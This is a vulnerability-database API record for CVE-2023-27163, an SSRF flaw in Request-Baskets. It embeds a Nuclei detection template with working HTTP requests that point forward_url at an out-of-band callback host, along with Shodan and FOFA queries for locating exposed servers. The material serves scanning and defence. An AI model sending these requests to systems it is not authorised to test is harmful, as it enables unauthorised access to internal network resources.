{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2023-27163/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2023-27163/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2023-27163/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2023-27163/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2023-27163/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2023-27163"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2023-27163"
    }
  },
  "data": {
    "nuclei": true,
    "nuclei_template": "http/cves/2023/CVE-2023-27163.yaml",
    "nuclei_template_severity": "medium",
    "nuclei_template_yaml": "id: CVE-2023-27163\n\ninfo:\n  name: Request-Baskets <= 1.2.1 - Server Side Request Forgery\n  author: Jaenact\n  severity: medium\n  description: |\n    Request-Baskets <= 1.2.1 allows unauthenticated SSRF via the forward_url parameter when creating a new basket.\n  impact: |\n    Attackers can perform SSRF attacks to access internal network resources, scan internal systems, or interact with services that should not be accessible from external networks.\n  remediation: |\n    Upgrade to Request-Baskets version 1.2.2 or later that addresses this SSRF vulnerability.\n  reference:\n    - https://github.com/darklynx/request-baskets\n    - https://hub.docker.com/r/darklynx/request-baskets\n    - https://infosecwriteups.com/exploit-analysis-request-baskets-v1-2-1-server-side-request-forgery-ssrf-688fffd1f424\n    - https://nvd.nist.gov/vuln/detail/CVE-2023-27163\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N\n    cvss-score: 6.5\n    cve-id: CVE-2023-27163\n    epss-score: 0.06591\n    epss-percentile: 0.93589\n    cwe-id: CWE-918\n    cpe: cpe:2.3:a:rbaskets:request_baskets:*:*:*:*:*:*:*:*\n  metadata:\n    verified: true\n    max-request: 2\n    vendor: darklynx\n    product: request-baskets\n    shodan-query: http.html:\"Request-Baskets\"\n    fofa-query: body=\"Request-Baskets\"\n  tags: cve,cve2023,ssrf,request-baskets,oast,proxy,vkev,vuln\n\nflow: http(1) && http(2)\n\nvariables:\n  bucketname: \"{{rand_base(7)}}\"\n\nhttp:\n  - raw:\n      - |\n        POST /api/baskets/{{bucketname}} HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json\n\n        {\n          \"forward_url\": \"http://{{interactsh-url}}\",\n          \"proxy_response\": true,\n          \"insecure_tls\": false,\n          \"expand_path\": true,\n          \"capacity\": 250\n        }\n\n    matchers:\n      - type: dsl\n        dsl:\n          - 'status_code == 201'\n          - 'contains(body, \"token\\\":\")'\n          - 'contains(content_type, \"application/json\")'\n        condition: and\n        internal: true\n\n  - raw:\n      - |\n        GET /{{bucketname}} HTTP/1.1\n        Host: {{Hostname}}\n\n    matchers:\n      - type: word\n        part: interactsh_protocol\n        words:\n          - \"http\"\n# digest: 490a0046304402207e953f62d18f7bfb7f181e37c53d9f74bf6be1df0afa179710a2c3042a67ad7c022045f4e160c287cfed5c8316238635615799c7cdb3f2b9ac4e075168180a564c66:922c64590222798bb761d5b6d8e72950"
  },
  "source": "nuclei",
  "vuln_id": "cve-2023-27163"
}